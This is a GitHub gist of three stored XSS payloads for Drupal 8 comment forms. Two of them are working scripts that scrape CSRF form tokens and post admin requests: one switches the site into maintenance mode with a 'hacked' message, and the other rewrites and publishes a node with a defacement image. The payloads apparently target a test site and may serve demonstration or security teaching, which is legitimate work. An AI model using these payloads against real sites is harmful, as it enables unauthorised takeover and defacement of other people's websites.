Last active
January 13, 2020 16:15
-
-
Save jaspreetaxelerant/42e7e31daf98615fff3ab986f203aff1 to your computer and use it in GitHub Desktop.
Stored XSS examples
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #0 d8 site: node/1 comment form with full html input format by uid0. | |
| <script>alert('XSS')</script> | |
| _________________________________________________________________________________________________ | |
| #1 d8 site: node/1 comment form with full html input format by uid0. | |
| It will move the site into maintenance mode | |
| <script>setTimeout(function(){ | |
| jQuery.get('/drupal_test/admin/config/development/maintenance', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; | |
| var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/); | |
| var build_id = matches[1]; | |
| var payload = { | |
| "maintenance_mode": 1, | |
| "form_id": 'system_site_maintenance_mode', | |
| "maintenance_mode_message": 'Nice work, your site is hacked!', | |
| "form_token": token, | |
| "form_build_id" : build_id, | |
| "op" : 'Save configuration' | |
| }; | |
| jQuery.post('/drupal_test/admin/config/development/maintenance', payload); | |
| }}); | |
| }, 3000); | |
| </script> | |
| _________________________________________________________________________________________________ | |
| #2 d8 site: node/2 comment form again and it will update the description and publish the node. | |
| <script>setTimeout(function(){ | |
| jQuery.get('/drupal_test/node/8/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; | |
| var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/); | |
| var build_id = matches[1]; | |
| var payload = { | |
| "body[und][0][value]": 'Something really bad!<img src="http://www.thenextrex.com/wp-content/uploads/2016/10/Hacked-by.gif">', | |
| "body[und][0][format]": 'full_html', | |
| "status": 1, | |
| "form_id": 'article_node_form', | |
| "form_token": token, | |
| "form_build_id" : build_id, | |
| "op" : 'Save' | |
| }; | |
| jQuery.post('/drupal_test/node/8/edit', payload); | |
| }}); | |
| }, 3000); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment